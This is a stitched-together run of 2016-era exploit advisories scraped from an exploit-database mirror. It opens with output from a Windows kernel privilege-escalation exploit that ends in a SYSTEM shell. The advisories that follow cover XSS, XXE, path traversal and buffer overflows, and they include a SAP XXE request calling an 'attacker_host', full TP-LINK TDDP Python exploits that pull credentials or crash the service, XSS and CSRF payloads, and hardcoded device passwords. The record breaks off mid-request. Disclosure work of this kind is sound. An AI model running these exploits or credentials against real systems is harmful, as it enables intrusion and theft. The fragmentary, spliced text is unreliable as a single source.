+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
+] Patching the Spurious Offset with 1967
Original HalpIntteruptRequest pointer: fffff80150e1fc40
+] Selected spurious PML4E: fffff67b3d9ecf08
+] Spurious PT: fffff67b3d9e1000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
*** Patching the original location to enable NX...
+] Patching the Spurious Offset with 1967
HAL address: fffff67b3d9e1000
+] w00t: Shellcode stored at: ffffffffffd00d50
+] Selected spurious PML4E: fffff67b3d9ecf10
+] Spurious PT: fffff67b3d9e2000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
+] Patching the Spurious Offset with 1967
Patch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\qa\Desktop>
C:\Users\qa\Desktop>whoami
nt authority\system

C:\Users\qa\Desktop>
HireHackking 
[RCESEC-2016-009] AppFusions Doxygen for Atlassian Confluence v1.3.2 renderContent() Persistent Cross-Site Scripting

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        AppFusions Doxygen for Atlassian Confluence
Vendor URL:     www.appfusions.com
Type:           Cross-site Scripting [CWE-79]
Date found:     29/06/2016
Date published: 20/11/2016
CVSSv3 Score:   6.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)
CVE:            -


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
AppFusions Doxygen for Atlassian Confluence v1.3.3
AppFusions Doxygen for Atlassian Confluence v1.3.2 
AppFusions Doxygen for Atlassian Confluence v1.3.1
AppFusions Doxygen for Atlassian Confluence v1.3.0
older versions may be affected too.


4. INTRODUCTION
===============
With Doxygen in Confluence, you can embed full-structure code documentation:
-Doxygen blueprint in Confluence to allow Doxygen archive imports
-Display documentation from annotated sources such as Java (i.e., JavaDoc), 
 C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and UNO/OpenOffice 
 flavors), Fortran, VHDL, Tcl, D in Confluence.
-Navigation supports code structure (classes, hierarchies, files), element 
 dependencies, inheritance and collaboration diagrams.
-Search documentation from within Confluence
-Restrict access to who can see/add what
-Doxygen in JIRA also available

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The application offers the functionality to import Doxygen documentations via a file upload to make them available in a Confluence page, but does not properly validate the file format/the contents of the uploaded Doxygen file. Since the uploaded file is basically a zipped archive, it is possible to store any type of file in it like an HTML file containing arbitrary script.

In DoxygenFileServlet.java (lines 82-105) the "file" GET parameter is read
and used as part of a File object:

private void renderContent(HttpServletRequest request, HttpServletResponse response) throws IOException {
    String pathInfo = request.getPathInfo();
    String[] pathInfoParts = pathInfo.split("file/");
    String requestedFile = pathInfoParts[1];
    File homeDirectory = this.applicationProperties.getHomeDirectory();
    String doxygenDir = homeDirectory.getAbsolutePath() + File.separator + "doxygen";
    File file = new File(doxygenDir, requestedFile);
    String contentType = this.getServletContext().getMimeType(file.getName());
    if (contentType == null) {
        contentType = "application/octet-stream";
    }
    response.setContentType(contentType);
    FileInputStream inputStream = null;
    ServletOutputStream outputStream = null;
    try {
        inputStream = new FileInputStream(file);
        outputStream = response.getOutputStream();
        IOUtils.copy((InputStream)inputStream, (OutputStream)outputStream);
    }
    finally {
        IOUtils.closeQuietly((InputStream)inputStream);
        IOUtils.closeQuietly((OutputStream)outputStream);
    }
}



6. RISK
=======
To successfully exploit this vulnerability, the attacker must be authenticated and must have the rights within Atlassian Confluence to upload
Doxygen files (default).

The vulnerability allows remote attackers to permanently embed arbitrary script code into the context of an Atlassian Confluence page, which offers a wide range of possible attacks such as redirecting users to arbitrary pages, present phishing content or attacking the browser and its components of a user visiting the page.

7. POC
===========

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40817.zip

8. SOLUTION
===========
Update to AppFusions Doxygen for Atlassian Confluence v1.3.4


9. REPORT TIMELINE (DD/MM/YYYY)
===============================
23/08/2016: Discovery of the vulnerability
23/08/2016: Sent preliminary advisory incl. PoC to known mail address
30/08/2016: No response, sent out another notification
30/08/2016: Vendor response, team is working on it
20/10/2016: Vendor releases v1.3.4 which fixes this vulnerability
20/11/2016: Advisory released


9. REFERENCES
=============
https://bugs.rcesecurity.com/redmine/issues/13
HireHackking 
Application:	SAP NetWeaver AS JAVA
Versions Affected:	SAP NetWeaver AS JAVA 7.5
Vendor URL:	SAP
Bugs:	XXE
Reported:	09.03.2016
Vendor response:	10.03.2016
Date of Public Advisory:	09.08.2016
Reference:	SAP Security Note 2296909
Author:	Vahagn Vardanyan (ERPScan)

1. ADVISORY INFORMATION

Title:  [ERPSCAN-16-034] SAP NetWeaver AS JAVA – XXE vulnerability in BC-BMT-BPM-DSK component
Advisory ID:[ERPSCAN-16-034]
Risk: high
Advisory URL: https://erpscan.com/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/
Date published: 11.11.2016
Vendors contacted: SAP


2. VULNERABILITY INFORMATION

Class: XXE
Impact: Denial of Service, Read File
Remotely Exploitable: yes
Locally Exploitable: no

CVSS Information

CVSS Base Score v3:    6.4 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) Low (L)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C : Impact to Confidentiality Low (L)
I : Impact to Integrity Low (L)
A : Impact to Availability High (H)


3. VULNERABILITY DESCRIPTION

1) It is possible, that an attacker can perform a DoS attack (for example, an XML Entity expansion attack)

2) An SMB Relay attack is a type of man-in-the-middle attack where an attacker asks a victim to authenticate to a machine controlled by the
attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways, giving him access.


4. VULNERABLE PACKAGES

BPEM PORTAL CONTENT 7.20
BPEM PORTAL CONTENT 7.30
BPEM PORTAL CONTENT 7.31
BPEM PORTAL CONTENT 7.40
BPEM PORTAL CONTENT 7.50


5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note  2296909


6. AUTHOR

 Vahagn Vardanyan (ERPScan)


7. TECHNICAL DESCRIPTION

PoC


POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1

Content-Type: text/xml

User-Agent: ERPscan

Host: SAP_IP:SAP_PORT

Content-Length: 480

Connection: Keep-Alive

Cache-Control: no-cache

Authorization: Basic ZXJwc2NhbjplcnBzY2Fu


<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host">
]><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">

   <SOAP-ENV:Body>

       <m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>

   &xxe;</SOAP-ENV:Body>

</SOAP-ENV:Envelope>


8. REPORT TIMELINE

Sent:  09.03.2016
Reported: 10.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 09.08.2016


9. REFERENCES

https://erpscan.com/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/
HireHackking 
<!--
Source: http://blog.skylined.nl/20161121001.html

Synopsis

A specially crafted web-page can cause an unknown type of memory corruption in Microsoft Internet Explorer 8. This vulnerability can cause the Ptls5::Ls­Find­Span­Visual­Boundaries method (or other methods called by it) to access arbitrary memory.

Known affected software, attack vectors and mitigations

Microsoft Internet Explorer 8

An attacker would need to get a target user to open a specially crafted web-page. Java­Script is not necessarily required to trigger the issue.

Description

The memory corruption causes the Ptls5::Ls­Find­Span­Visual­Boundaries method to access data at seemingly random addresses. However, these addresses appear to always be in the same range as valid heap addresses, even if they are often not DWORD aligned. The reason for the memory corruption is not immediately obvious.

Repro.html
-->

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
  <body>
    <button>
      <pre>
        <x>
          <sub>
            <ruby>
              <img height="1"/>
            </ruby>
          </sub>
        </x>
      </pre>
    </button>
  </body>
</html>

<!--
Time-line

July 2014: This vulnerability was found through fuzzing.
November 2016: Details of this issue are released.
-->
HireHackking 
=================================================================
# Crestron AM-100 (Multiple Vulnerabilities)
=================================================================
# Date: 2016-08-01
# Exploit Author: Zach Lanier
# Vendor Homepage: https://www.crestron.com/products/model/am-100
# Version: v1.1.1.11 - v1.2.1
# CVE: CVE-2016-5639 
# References: 
#   https://medium.com/@benichmt1/an-unwanted-wireless-guest-9433383b1673#.78tu9divi
#   https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md

Description:
The Crestron AirMedia AM-100 with firmware versions v1.1.1.11 - v1.2.1 is vulnerable to multiple issues.

1) Path Traversal

GET request: 
http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&src=../../../../../../../../../../../../../../../../../../../../etc/shadow

2) Hidden Management Console

http://[AM-100-ADDRESS]/cgi-bin/login_rdtool.cgi
The AM-100 has a hardcoded default credential of rdtool::mistral5885
This interface contains the ability to upload arbitrary files (RD upload) and can enable a telnet server that runs on port 5885 (RD Debug mode).

3) Hardcoded credentials

The default root password for these devices is root::awind5885
Valid login sessions for the default (non-debugging) management interface are stored on the filesystem as session01, session02.. etc. Cleartext credentials can be read directly from these files.
HireHackking 
1. Advisory Information

Title: TP-LINK TDDP Multiple Vulnerabilities
Advisory ID: CORE-2016-0007
Advisory URL: http://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities
Date published: 2016-11-21
Date of last update: 2016-11-18
Vendors contacted: TP-Link
Release mode: User release

2. Vulnerability Information

Class: Missing Authentication for Critical Function [CWE-306], Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') [CWE-120]
Impact: Code execution, Information leak
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2

3. Vulnerability Description

TP-LINK [1] ships some of their devices with a debugging protocol activated by default. This debugging protocol is listening on the 1040 UDP port on the LAN interface.

Vulnerabilities were found in the implementation of this protocol, that could lead to remote code execution and information leak (credentials acquisition).

4. Vulnerable Devices

TP-LINK WA5210g. (Firmware v1 and v2 are vulnerable)
Other devices might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

No workarounds are available for this device.

6. Credits

This vulnerability was discovered and researched by Andres Lopez Luksenberg from Core Security Exploit Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.

7. Technical Description / Proof of Concept Code

TP-LINK distributes some of their hardware with a debugging service activate by default. This program uses a custom protocol. Vulnerabilities were found using this protocol, that could lead to remote code execution or information leak.

7.1. Missing Authentication for TDDP v1

[CVE-pending-assignment-1] If version 1 is selected when communicating with the TDDP service, there is a lack of authentication in place. Additionally if the message handler accepts the "Get configuration" message type, this will result in the program leaking the web interface configuration file, which includes the web login credentials.

The following is a proof of concept to demonstrate the vulnerability (Impacket [2] is required for the PoC to work):

 
import socket
import re
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct

class TDDP(Structure):
    structure = (
       ('version','B=0x1'),
       ('type','B=0'),      
       ('code','B=0'),
       ('replyInfo','B=0'),
       ('packetLength','>L=0'),
       ('pktID','<H=1'),
       ('subType','B=0'),
       ('reserved','B=0'),
       ('payload',':=""'),       
    )
    def printPayload(self):
        print self.getPayloadAsString()
   
    def getPayloadAsString(self):
        s=''
        for i in range(len(self['payload'])):
            s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
        return s


class TDDPRequestsPacketBuilder(object):
    SET_CONFIG = 1
    GET_CONFIG = 2
    CMD_SYS0_PR = 3
    GET_SERIAL_NUMBER = 5
   
    GET_PRODUCT_ID = 10   
   
    def getRequestPacket(self):
        tddp = TDDP()
        tddp['version'] = 1
        tddp['replyInfo'] = 1       
        return tddp
   
    def getConfigPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + 'all'
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def setConfigPacket(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.SET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + trail
        tddp['packetLength'] = len(tddp['payload'])
        return tddp
       
    def getSerialNumberPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_SERIAL_NUMBER
        return tddp

    def getProductIDPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_PRODUCT_ID
        return tddp
   
    def CMD_SYS0_PR_Packet(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.CMD_SYS0_PR
        tddp['replyInfo'] = 2
        tddp['payload'] = ('\x00'*0x10)
        tddp['packetLength'] = len(tddp['payload'])
        tddp['payload'] += trail
        return tddp
       

class TPLINKConfig(object):
    def __init__(self, aConfig):
        self.__parseConfig(aConfig)
       
    def __sanitizeKeyValue(self, k, v):
        k = k.replace("\r", "")
        k = k.replace("\n", "")
       
        v = v.replace("\r", "")
        v = v.replace("\n", "")
       
        return k,v
       
    def __parseConfig(self, aConfig):
        self.__key_order = []
        self.Header = aConfig[:0x10]
        pending = aConfig[0x10:]
        k_v = re.findall("(.*?) (.*)", pending)
       
        for k, v in k_v:
            k,v = self.__sanitizeKeyValue(k,v)
            real_value = v.split(" ")
            if len(real_value) == 1:
                real_value = real_value[0]
               
            self.__dict__[k] = real_value
            self.__key_order.append(k)
           
    def __str__(self):
        cfg = []
        cfg.append(self.Header)
       
        for k in self.__key_order:
            value = self.__dict__[k]

            if not isinstance(value, basestring):
                str_value = " ".join(value)
            else:
                str_value = value
           
            line = "%s %s" % (k, str_value)
           
            cfg.append(line)
       
       
        str_cfg =  "\r\n".join(cfg)
       
        return str_cfg
       
class TDDPSessionV1(object):
    def __init__(self, ip, port=1040):
        self.ip = ip
        self.port = port
        self.req_buidler = TDDPRequestsPacketBuilder()

    def send(self, aPacket):
        self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.conn.sendto(str(aPacket), (self.ip, self.port))
        self.conn.close()
       
    def recv(self, n):
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp.bind(('', 61000))
        data, addr = udp.recvfrom(n)
        return TDDP(data)
   
    def _send_and_recv(self, packet, n):
        self.send(packet)
        return self.recv(n)
   
    #####################################
    def getConfig(self):
        c_packet = self.req_buidler.getConfigPacket()
        return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])
       
    def getSerialNumber(self):
        c_packet = self.req_buidler.getSerialNumberPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()
       
    def getProductID(self):
        c_packet = self.req_buidler.getProductIDPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()
       
    def setInitState(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
        return self._send_and_recv(c_packet, 50000)
       
    def save(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
        self._send_and_recv(c_packet, 50000)
       
    def reboot(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
        self._send_and_recv(c_packet, 50000)

    def clr_dos(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
        self._send_and_recv(c_packet, 50000)
       
    def setConfig(self, aConfig):
        c_packet = self.req_buidler.setConfigPacket(str(aConfig))
        self._send_and_recv(c_packet, 50000)
 
HOST = "192.168.1.254"

s = TDDPSessionV1(HOST)
config = s.getConfig()
print "user: ", config.lgn_usr
print "pass: ", config.lgn_pwd


 
7.2. Buffer Overflow in TDDP v1 protocol

[CVE-pending-assignment-2] A buffer overflow vulnerability was found when sending a handcrafted "set configuration" message to the TDDP service with an extensive configuration file and forcing version 1 in the packet.

The following is a proof of concept to demonstrate the vulnerability by crashing the TDDP service (Impacket [2] is required for the PoC to work). To reestablish the TDDP service the device must be restarted:

 
import socket
import re
import string 
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct


class TDDP(Structure):
    structure = (
       ('version','B=0x1'),
       ('type','B=0'),      
       ('code','B=0'),
       ('replyInfo','B=0'),
       ('packetLength','>L=0'),
       ('pktID','<H=1'),
       ('subType','B=0'),
       ('reserved','B=0'),
       ('payload',':=""'),   
    )
    def printPayload(self):
        print self.getPayloadAsString()
   
    def getPayloadAsString(self):
        s=''
        for i in range(len(self['payload'])):
            s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
        return s
        
        
class TDDPRequestsPacketBuilder(object):
    SET_CONFIG = 1
    GET_CONFIG = 2
    CMD_SYS0_PR = 3
    GET_SERIAL_NUMBER = 5
   
    GET_PRODUCT_ID = 10   
   
    def getRequestPacket(self):
        tddp = TDDP()
        tddp['version'] = 1
        tddp['replyInfo'] = 1       
        return tddp
   
    def getConfigPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + 'all'
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def setConfigPacket(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.SET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + trail
        tddp['packetLength'] = len(tddp['payload'])
        return tddp
       
    def getSerialNumberPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_SERIAL_NUMBER
        return tddp

    def getProductIDPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_PRODUCT_ID
        return tddp
   
    def CMD_SYS0_PR_Packet(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.CMD_SYS0_PR
        tddp['replyInfo'] = 2
        tddp['payload'] = ('\x00'*0x10)
        tddp['packetLength'] = len(tddp['payload'])
        tddp['payload'] += trail
        return tddp
       
       
class TPLINKConfig(object):
    def __init__(self, aConfig):
        self.__parseConfig(aConfig)
       
    def __sanitizeKeyValue(self, k, v):
        k = k.replace("\r", "")
        k = k.replace("\n", "")
       
        v = v.replace("\r", "")
        v = v.replace("\n", "")
       
        return k,v
       
    def __parseConfig(self, aConfig):
        self.__key_order = []
        self.Header = aConfig[:0x10]
        pending = aConfig[0x10:]
        k_v = re.findall("(.*?) (.*)", pending)
       
        for k, v in k_v:
            k,v = self.__sanitizeKeyValue(k,v)
            real_value = v.split(" ")
            if len(real_value) == 1:
                real_value = real_value[0]
               
            self.__dict__[k] = real_value
            self.__key_order.append(k)
           
    def __str__(self):
        cfg = []
        cfg.append(self.Header)
       
        for k in self.__key_order:
            value = self.__dict__[k]

            if not isinstance(value, basestring):
                str_value = " ".join(value)
            else:
                str_value = value
           
            line = "%s %s" % (k, str_value)
           
            cfg.append(line)
       
       
        str_cfg =  "\r\n".join(cfg)
       
        return str_cfg
        
        
class TDDPSessionV1(object):
    def __init__(self, ip, port=1040):
        self.ip = ip
        self.port = port
        self.req_buidler = TDDPRequestsPacketBuilder()

    def send(self, aPacket):
        self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.conn.sendto(str(aPacket), (self.ip, self.port))
        self.conn.close()
        
    def recv(self, n):
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp.bind(('', 61000))
        data, addr = udp.recvfrom(n)
        return TDDP(data)
    
    def _send_and_recv(self, packet, n):
        self.send(packet)
        return self.recv(n)
    
    #####################################
    def getConfig(self):
        c_packet = self.req_buidler.getConfigPacket()
        return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])
        
    def getSerialNumber(self):
        c_packet = self.req_buidler.getSerialNumberPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()
        
    def getProductID(self):
        c_packet = self.req_buidler.getProductIDPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()
        
    def setInitState(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
        return self._send_and_recv(c_packet, 50000)
        
    def save(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
        self._send_and_recv(c_packet, 50000)
        
    def reboot(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
        self._send_and_recv(c_packet, 50000)

    def clr_dos(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
        self._send_and_recv(c_packet, 50000)
        
    def setConfig(self, aConfig):
        c_packet = self.req_buidler.setConfigPacket(str(aConfig))
        self._send_and_recv(c_packet, 50000)
        
        
class Exploit(TDDPSessionV1):
    def run(self):
        c_packet = self.req_buidler.getRequestPacket()
        c_packet['type'] = self.req_buidler.SET_CONFIG        
        c_packet['payload'] = "A"*325
        c_packet['packetLength'] = 0x0264           
        return self.send(c_packet)

HOST = "192.168.1.254"
PORT = 1040		
s = Exploit(HOST)
s.run()
	  
 
8. Report Timeline

2016-10-04: Core Security sent an initial notification to TP-Link.
2016-10-07: Core Security sent a second notification to TP-Link.
2016-10-31: Core Security sent a third notification to TP-Link through Twitter.
2016-11-09: Core Security sent a fourth notification to TP-Link through email and Twitter without receiving any response whatsoever.
2016-11-10: Core Security sent a request to Mitre for two CVE ID's for this advisory.
2016-11-12: Mitre replied that the vulnerabilities didn't affected products that were in the scope for CVE.
2016-11-21: Advisory CORE-2016-0007 published.
9. References

[1] http://www.tplink.com/. 
[2] https://www.coresecurity.com/corelabs-research/open-source-tools/impacket. 

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company's strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security's analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2016 Core Security and (c) 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
HireHackking 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Mezzanine 4.2.0
Fixed in:            4.2.1
Fixed Version Link:  https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1
Vendor Website:      http://mezzanine.jupo.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

Mezzanine is an open source CMS written in python. In version 4.2.0, it is
vulnerable to two persistent XSS attacks, one of which requires extended
privileges, the other one does not. These issues allow an attacker to steal
cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Persistent XSS via Name in Comments

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: When leaving a comment on a blog post, the author name is echoed
unencoded in the backend, leading to persistent XSS.

Proof of Concept:

Leave a comment, as author name use '"><img src=no onerror=alert(1)> To trigger
the payload, view the comment overview in the admin backend: http://
localhost:8000/admin/generic/threadedcomment

XSS 2: Persistent XSS via HTML file upload

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

Description: When uploading files via the media manager, the extension .html is
allowed, leading to XSS via file upload. An account with the permissions to
upload files to the media manager is required.

Proof of Concept:

Visit the media manager and upload a .html file: http://localhost:8000/admin/
media-library/upload/?ot=desc&o=date As uploaded files are stored inside the
web root, it can now be accessed, thus executing the JavaScript code it
contains: http://localhost:8000/static/media/uploads/xss.html

4. Solution

To mitigate this issue please upgrade at least to version 4.2.1:

https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/05/2016 Vendor replies
09/19/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Mezzanine-420-XSS-177.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
HireHackking 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    FUDforum 3.0.6
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://fudforum.org/forum/
Vulnerability Type:  XSS, Login CSRF
Remote Exploitable:  Yes
Reported to vendor:  04/11/2016
Disclosed to public: 11/10/2016
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to multiple persistent XSS issues. This allows an attacker to steal cookies,
inject JavaScript keyloggers, or bypass CSRF protection. Additionally, FUDforum
is vulnerable to Login-CSRF.

3. Details

XSS 1: Via Filename in Private Message

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The filename of attached images in private messages is vulnerable
to persistent XSS.

Proof of Concept:

Send a PM to a user. Add an attachment, where the filename is: '"><img src=no
onerror=alert(1)>.jpg When the recipient views the PM, the injected code will
be executed.

XSS 2: Via Filename in Forum Posts

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The filename of attached images in forum posts is vulnerable to
persistent XSS.

Proof of Concept:

Create a new forum post. Add an attachment, where the filename is: '"><img src=
no onerror=alert(1)>.jpg When viewing the post the injected code will be
executed.

XSS 3: Via Signature in User Profile

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: When editing a profile, the signature is echoed unencoded, leading
to persistent XSS.

Proof of Concept:

Visit http://localhost/fudforum/index.php?t=register as signature, use '"></
textarea><img src=no onerror=alert(1)> The injected code is either executed
when the user themselves edits their profile - which may be exploited via login
CSRF - or when an admin visits the edit profile page located here: http://
localhost/fudforum/index.php?t=register&mod_id=6&&SQ=
1a85a858f326ec6602cb6d78d698f60a

Login CSRF

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description: The login of FUDForum does not have any CSRF protection. The
impact of this is low, but an attacker might get a victim to disclose sensitive
information by using CSRF to log the victim into an attacker-controlled
account. An example would be the accidental sending of a sensitive private
message while being logged into an account controlled by an attacker.
Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the
user area.

Proof of Concept:

<html> <body> <form action="http://localhost/fudforum/index.php?t=login" method
="POST"> <input type="hidden" name="login" value="admin" /> <input type=
"hidden" name="password" value="admin" /> <input type="hidden" name="SQ" value=
"0" /> <input type="hidden" name="adm" value="" /> <input type="submit" value=
"Submit request" /> </form> </body> </html>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
HireHackking 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:   LEPTON 2.2.2 stable
Fixed in:           2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website:     http://www.lepton-cms.org/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to        11/10/2016
public:
Release mode:       Coordinated Release
CVE:                n/a
Credits             Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to code execution as it is possible to upload files with dangerous
type via the media manager.

3. Details

Upload of file with dangerous type

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description: When uploading a file in the media tab, there is a client-side as
well as a server-side extension check. The server-side check can be bypassed by
including a valid extension before the desired extension, leading to code
execution or XSS.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken=
099c871bbf640f2f91d2az1472132032 HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: lep9131sessionid=
8bgkd5rae5nhbn0jaac8jpkpc5 Connection: close Content-Type: multipart/form-data;
boundary=---------------------------38397165016927337851258279296
Content-Length: 613 -----------------------------38397165016927337851258279296
